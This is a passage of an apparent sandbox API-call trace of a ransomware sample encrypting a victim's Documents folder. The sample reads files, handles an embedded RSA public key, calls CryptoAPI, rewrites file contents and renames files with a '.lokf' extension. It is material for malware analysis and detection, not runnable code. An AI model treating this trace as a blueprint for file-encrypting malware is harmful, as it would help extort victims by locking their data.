lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.546] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.546] CloseHandle (hObject=0x5cc) returned 1 [0059.547] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\TTeO3-kFVQDhs.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r4i1q ij0vyylz2qe\\tteo3-kfvqdhs.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\TTeO3-kFVQDhs.ppt.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r4i1q ij0vyylz2qe\\tteo3-kfvqdhs.ppt.lokf")) returned 1 [0059.547] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.547] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.547] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0059.548] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70d2dde0, ftCreationTime.dwHighDateTime=0x1d4ce9a, ftLastAccessTime.dwLowDateTime=0xebf36fc0, ftLastAccessTime.dwHighDateTime=0x1d4c89c, ftLastWriteTime.dwLowDateTime=0xebf36fc0, ftLastWriteTime.dwHighDateTime=0x1d4c89c, nFileSizeHigh=0x0, nFileSizeLow=0x1727b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VzHk HXQOnf5.odp", cAlternateFileName="VZHKHX~1.ODP")) returned 1 [0059.548] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\VzHk HXQOnf5.odp") returned=".odp" [0059.548] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\VzHk HXQOnf5.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r4i1q ij0vyylz2qe\\vzhk hxqonf5.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.549] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=94843) returned 1 [0059.549] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.551] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x17255, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.551] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.552] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.552] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x1727b, lpOverlapped=0x0) returned 1 [0059.552] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.552] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.552] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.552] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0059.553] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.553] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.553] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.553] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.553] GetLastError () returned 0x0 [0059.553] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.553] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0059.553] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.553] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.553] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.553] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.553] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x17280) returned 0x9c88ae8 [0059.554] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.554] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87e60 [0059.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6b8 [0059.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87ea8 [0059.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6d0 [0059.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6e8 [0059.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.554] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.554] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6d0 | out: hHeap=0x660000) returned 1 [0059.554] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6e8 | out: hHeap=0x660000) returned 1 [0059.554] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b6e8 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b6d0 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6e8 | out: hHeap=0x660000) returned 1 [0059.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6d0 | out: hHeap=0x660000) returned 1 [0059.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0059.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.555] GetCurrentThreadId () returned 0x9e0 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c83d58 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.555] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.556] GetCurrentThreadId () returned 0x9e0 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6d0 [0059.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b6e8 [0059.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0059.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0059.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0059.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85728 [0059.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85740 [0059.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85758 [0059.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85728 | out: hHeap=0x660000) returned 1 [0059.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85728 [0059.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85740 | out: hHeap=0x660000) returned 1 [0059.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6d0 | out: hHeap=0x660000) returned 1 [0059.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b6d0 [0059.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0059.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85728 | out: hHeap=0x660000) returned 1 [0059.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0059.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0059.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6d0 | out: hHeap=0x660000) returned 1 [0059.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85758 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6e8 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c87ea8 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.559] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c88ae8*, nNumberOfBytesToWrite=0x17276, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c88ae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x17276, lpOverlapped=0x0) returned 1 [0059.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88ae8 | out: hHeap=0x660000) returned 1 [0059.559] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1727b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.559] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b588 [0059.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0059.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3294ac8 [0059.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b588 | out: hHeap=0x660000) returned 